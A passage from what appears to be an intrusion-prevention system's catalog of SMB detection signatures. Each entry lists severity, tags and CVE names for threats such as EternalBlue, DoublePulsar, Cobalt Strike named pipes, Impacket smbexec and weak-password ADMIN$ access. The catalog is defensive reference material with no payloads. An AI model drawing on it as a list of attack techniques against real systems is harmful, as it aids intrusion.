Last changed: sgpkg-ips-429-4219
Vulnerability: SMB-Unimplemented-Command-Com-New-File-Size
Description:
Back to top

SMB-TCP_CHS-Unlock-Byte-Range-Request

About this situation: Samba Unlock Byte Range request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Windows-Admin-Share-Default-Password-Access

About this situation: Attempt to access ADMIN$ share using weak credentials
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: MS-Windows-Weak-Administrator-Password
Description:
Back to top

SMB-TCP_CHS-Windows-GPP-Password-Elevation-of-Privilege-Vulnerability-CVE-2014-1812

About this situation: Traffic potentially attempting to exploit a vulnerability in Windows GPP detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2014, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Vulnerability: Windows-GPP-Password-Elevation-of-Privilege-Vulnerability-CVE-2014-1812
Description:
Back to top

SMB-TCP_CHS-Windows-Server-Message-Block-Vulnerability

About this situation: Detects exploits using crafted SMB headers to cause a DoS on various Windows systems
Context: SMB Client Header Stream
Severity: 10
Tags: Windows, x86, MS2005-06, CVE2005, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SMB-Windows-Server-Message-Block-Vulnerability
Description:
Back to top

SMB-TCP_CHS-Windows-SMB-Denial-Of-Service-Vulnerability-CVE-2024-43642

About this situation: An attempt to exploit a vulnerability in Windows
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1798-5242
Last changed: sgpkg-ips-1804-5242
Vulnerability: Windows-SMB-Denial-Of-Service-Vulnerability-CVE-2024-43642
Description:
Back to top

SMB-TCP_CHS-Write-And-Close-Request

About this situation: Samba Move request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-And-Unlock-Request

About this situation: Samba Write And Unlock request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-AndX-Abnormal-Write-Mode-Usage

About this situation: Suspicious Write Mode in an SMB Write AndX command
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-302-4219
Last changed: sgpkg-ips-925-5242
Description:
Back to top

SMB-TCP_CHS-Write-AndX-Request

About this situation: Samba Write AndX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-Bulk-Data-Request

About this situation: Samba Write Bulk Data request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-Bulk-Request

About this situation: Samba Write Bulk request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-Complete-Request

About this situation: Samba Write Complete request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-MPX-Request

About this situation: Samba Write MPX request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-MPX-Secondary-Request

About this situation: Samba Write MPX Secondary request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-Print-File-Request

About this situation: Samba Open Print File request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-Raw-Request

About this situation: Samba Write Raw request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS-Write-Request

About this situation: Samba Write request was detected
Context: SMB Client Header Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-460-5211
Last changed: sgpkg-ips-460-5211
Description:
Back to top

SMB-TCP_CHS_Corel-Multiple-Products-Multiple-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Corel CorelDRAW X7 detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Corel PDF Fusion, Corel CorelDRAW X7, Corel Painter 2015, Corel PaintShop Pro X7, Corel Photo-Paint X7, Corel CAD, Corel VideoStudio Pro X7, Corel FastFlick, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Corel-Multiple-Products-Multiple-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS_Corel-Paintshop-Pro-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Corel PaintShop Pro detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Corel PaintShop Pro, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-546-5211
Last changed: sgpkg-ips-631-5211
Vulnerability: Corel-Paintshop-Pro-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS_Foxit-Reader-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Foxit Reader, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-493-5211
Last changed: sgpkg-ips-493-5211
Vulnerability: Foxit-Reader-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS_Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Foxit Software Foxit Reader detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Foxit Reader, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-750-5211
Vulnerability: Foxit-Reader-Phoneinfo.dll-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS_Heap-Based-Buffer-Overflow-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1688

About this situation: An attempt to exploit a vulnerability in ksmbd detected
Context: SMB Client Header Stream
Severity: 7
Tags: Linux, Any Hardware, ksmbd, CVE2022, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Vulnerability: Heap-Based-Buffer-Overflow-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1688
Description:
Back to top

SMB-TCP_CHS_Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975

About this situation: An attempt to exploit a vulnerability in Microsoft Data Access Components detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2011-08, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-406-4219
Last changed: sgpkg-ips-406-4219
Vulnerability: Microsoft-Data-Access-Insecure-Library-Loading-CVE-2011-1975
Description:
Back to top

SMB-TCP_CHS_Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016

About this situation: Detected attempt to exploit a vulnerability in Microsoft Expression Design
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Expression Design, MS2012-03, CVE2012, CVE2013, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-444-4219
Last changed: sgpkg-ips-444-4219
Vulnerability: Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016
Umplayer-Wintab32.dll-Insecure-Library-Loading
Corel-PDF-Fusion-Wintab32.dll-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS_Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, MS2012-02, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Microsoft-Indeo-Codec-Insecure-Library-Loading-Vulnerability
Description:
Back to top

SMB-TCP_CHS_Microsoft-Visual-Studio-MFC-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in Microsoft Visual Studio detected
Context: SMB Client Header Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Visual Studio, MS2011-04, CVE2010, Windows not specific, Microsoft Visual Studio not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-410-4219
Vulnerability: Microsoft-Visual-Studio-MFC-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS_MS-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145

About this situation: Detected attempt to exploit a vulnerability in Microsoft Windows
Context: SMB Client Header Stream
Severity: 7
Tags: Windows Vista, Any Hardware, MS2011-01, CVE2010, Windows Vista not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Microsoft-Windows-Backup-Manager-Insecure-Library-Loading-CVE-2010-3145
Description:
Back to top

SMB-TCP_CHS_Oracle-Java-Runtime-Environment-Insecure-File-Loading

About this situation: An attempt to exploit a vulnerability in Oracle Java Runtime Environment detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Java Runtime Environment, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Vulnerability: Oracle-Java-Runtime-Environment-Insecure-File-Loading
Description:
Back to top

SMB-TCP_CHS_Soda-PDF-Insecure-Library-Loading

About this situation: An attempt to exploit a vulnerability in LULU Software Soda PDF detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, LULU Software Soda PDF, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-544-5211
Vulnerability: Soda-PDF-Insecure-Library-Loading
Description:
Back to top

SMB-TCP_CHS_Suspicious-Request

About this situation: A suspicious traffic pattern detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-560-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

SMB-TCP_CHS_Wireshark-Insecure-Search-Path-Script-Execution

About this situation: An attempt to exploit a vulnerability in Wireshark Foundation Wireshark detected
Context: SMB Client Header Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Wireshark, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-426-4219
Vulnerability: Wireshark-Insecure-Search-Path-Script-Execution
Description:
Back to top

SMB-TCP_Cobalt-Strike-Named-Pipe

About this situation: A named pipe used by Cobalt Strike detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1384-5242
Last changed: sgpkg-ips-1384-5242
Vulnerability: Cobalt-Strike-Named-Pipe-Infection-Traffic
Description:
Back to top

SMB-TCP_CS-Microsoft-Windows-Search-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Named Pipe Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-06, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Microsoft-Windows-Search-Information-Disclosure
Description:
Back to top

SMB-TCP_CS-Microsoft-Windows-Search-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB Client Named Pipe Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-975-5242
Vulnerability: Microsoft-Windows-Search-Type-Confusion
Description:
Back to top

SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-931-5242
Vulnerability: Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0143-Memory-Corruption
Description:
Back to top

SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0146-RCE

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-931-5242
Last changed: sgpkg-ips-931-5242
Vulnerability: Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0146-RCE
Description:
Back to top

SMB-TCP_CS-Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure

About this situation: A Microsoft Windows SMB Server Smbv1 Information Disclosure vulnerability
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Disclosure, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-937-5242
Vulnerability: Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure
Description:
Back to top

SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-Information-Disclosure-2

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1009-5242
Vulnerability: Microsoft-Windows-SMB-Server-Smbv1-Information-Disclosure-2
Description:
Back to top

SMB-TCP_CS-Microsoft-Windows-Smb-Server-Smbv1-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2017, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1005-5242
Last changed: sgpkg-ips-1005-5242
Vulnerability: Microsoft-Windows-Smb-Server-Smbv1-Out-Of-Bounds-Read-CVE-2017-11781
Description:
Back to top

SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Motorola Timbuktu Pro detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Motorola Timbuktu Pro, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-277-4219
Vulnerability: Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow
Description:
Back to top

SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Motorola Timbuktu Pro detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Motorola Timbuktu Pro, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-288-4219
Last changed: sgpkg-ips-289-4219
Vulnerability: Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow
Description:
Back to top

SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow-3

About this situation: An attempt to exploit a vulnerability in Motorola Timbuktu Pro detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Motorola Timbuktu Pro, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow
Description:
Back to top

SMB-TCP_CS-MSRPC-Bind-Over-SMB2

About this situation: An MSRPC bind request over SMB was detected
Context: TCP SMB Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-427-4219
Last changed: sgpkg-ips-427-4219
Vulnerability: MSRPC-Bind-Over-SMB2
Description:
Back to top

SMB-TCP_CS-Samba-SMB1-Smb_request_done-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Samba Team Samba detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Samba, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1022-5242
Vulnerability: Samba-SMB1-Smb_request_done-Use-After-Free
Description:
Back to top

SMB-TCP_CS-Trans2-DoublePulsar-Request

About this situation: An attempt to check for DoublePulsar SMB backdoor was detected
Context: TCP SMB Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-911-5242
Last changed: sgpkg-ips-912-5242
Vulnerability: DoublePulsar-Backdoor
Description:
Back to top

SMB-TCP_CS_Suspected-APT-Traffic-Pattern

About this situation: An SMB request resembling APT traffic detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1007-5242
Last changed: sgpkg-ips-1007-5242
Vulnerability: Known-APT-Traffic
Description:
Back to top

SMB-TCP_EternalBlue-Large-Buffer

About this situation: EternalBlue Buffer Allocation attempt
Context: TCP SMB Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, MS2017-03, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-910-5242
Last changed: sgpkg-ips-910-5242
Vulnerability: EternalBlue-Probe
Description:
Back to top

SMB-TCP_Failed-Session-Setup

About this situation: SMB Session setup failed
Context: TCP SMB Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: SMB-Failed-Session-Setup
Description:
Back to top

SMB-TCP_FireEye-Red-Team-Tool-IMPACKETOBF-Smbexec

About this situation: Usage of FireEye's IMPACKETOBF tool's smbexec functionality detected.
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: FireEye-Red-Team-Tools
Description:
Back to top

SMB-TCP_FR-Ani-Windows-Animationheader-Length-Buffer-Overflow-Upload

About this situation: Malicious ANI file detected, the file may freeze Windows OS
Context: SMB File Read Stream
Severity: 7
Tags: Windows ME, Windows 2003, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows XP SP1, Windows XP SP0, x86, MS2005-01, CVE2004, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Ani-Windows-Animationheader-Length-Buffer-Overflow
Description:
Back to top

SMB-TCP_FR-Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-DoS-Download

About this situation: Malicious ANI file detected, the file may freeze Windows OS
Context: SMB File Read Stream
Severity: 2
Tags: Windows NT, Windows 2003, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows XP SP1, Windows XP SP0, x86, CVE2004, Windows NT not specific, Windows 2003 not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
Description:
Back to top

SMB-TCP_FR-Executable-File-Read

About this situation: Executable file detected
Context: SMB File Read Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-370-4219
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

SMB-TCP_FR-Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: SMB File Read Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-06, CVE2011, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Microsoft-OLE-Automation-Underflow-Vulnerability-CVE-2011-0658
Description:
Back to top

SMB-TCP_FR-Windows-Shell-Shortcut-Arbitrary-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Windows
Context: SMB File Read Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-323-4219
Last changed: sgpkg-ips-323-4219
Vulnerability: Windows-Shell-Shortcut-Arbitrary-Code-Execution
Description:
Back to top

SMB-TCP_FR-Windows-Task-Scheduler-Job-File-System-Compromise

About this situation: Buffer overflow attempt against Windows Task Scheduler
Context: SMB File Read Stream
Severity: 7
Tags: Windows, x86, Windows Task Scheduler, MS2004-07, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-256-3038
Vulnerability: Windows-Task-Scheduler-Job-File-System-Compromise
Description:
Back to top

SMB-TCP_FW-Ani-Windows-Animationheader-Length-Buffer-Overflow-Upload

About this situation: Malicious ANI file detected, the file may freeze Windows OS
Context: SMB File Write Stream
Severity: 7
Tags: Windows ME, Windows 2003, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows XP SP1, Windows XP SP0, x86, MS2005-01, CVE2004, Windows 2003 not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Ani-Windows-Animationheader-Length-Buffer-Overflow
Description:
Back to top

SMB-TCP_FW-Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-DoS-Upload

About this situation: Malicious ANI file detected, the file may freeze Windows OS
Context: SMB File Write Stream
Severity: 2
Tags: Windows NT, Windows 2003, Windows 2000 SP0, Windows 2000 SP1, Windows 2000 SP2, Windows 2000 SP3, Windows 2000 SP4, Windows XP SP1, Windows XP SP0, x86, CVE2004, Windows NT not specific, Windows 2003 not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Ani-Windows-Zero-Frame-Or-Rate-Number-Ani-File-Denial-Of-Service
Description:
Back to top

SMB-TCP_FW-Executable-File-Write

About this situation: Executable file detected
Context: SMB File Write Stream
Severity: 2
Tags: Windows, x86, Windows not specific, Possibly Unwanted Content, TCP Client Traffic
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-370-4219
Vulnerability: Executable-File-Transfer
File-Type-Identification
Description:
Back to top

SMB-TCP_FW-Windows-Shell-Shortcut-Arbitrary-Code-Execution

About this situation: Attempt to exploit a vulnerability in Microsoft Windows
Context: SMB File Write Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-08, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-323-4219
Last changed: sgpkg-ips-323-4219
Vulnerability: Windows-Shell-Shortcut-Arbitrary-Code-Execution
Description:
Back to top

SMB-TCP_FW-Windows-Task-Scheduler-Job-File-System-Compromise

About this situation: Buffer overflow attempt against Windows Task Scheduler
Context: SMB File Write Stream
Severity: 7
Tags: Windows, x86, Windows Task Scheduler, MS2004-07, CVE2004, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-256-3038
Vulnerability: Windows-Task-Scheduler-Job-File-System-Compromise
Description:
Back to top

SMB-TCP_Impacket-Generated-Traffic

About this situation: Impacket generated traffic was detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Vulnerability: Impacket-Generated-Traffic
Description:
Back to top

SMB-TCP_Internet-Explorer-Authentication-Reflection-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Internet Explorer detected
Context: TCP SMB Client Stream
Severity: 7
Tags: Windows, Any Hardware, MS2009-04, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Internet-Explorer-And-HTTP-Services-Authentication-Reflection-Code-Execution
Description:
Back to top

SMB-TCP_Known-EternalBlue-Probe-Echo-Reply

About this situation: EternalBlue probing communication Echo Reply
Context: TCP SMB Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, MS2017-03, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-908-5242
Last changed: sgpkg-ips-909-5242
Vulnerability: EternalBlue-Probe
Description:
Back to top

SMB-TCP_Linux-Kernel-Ksmbd-ACL-Inheritance-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in ksmbd detected
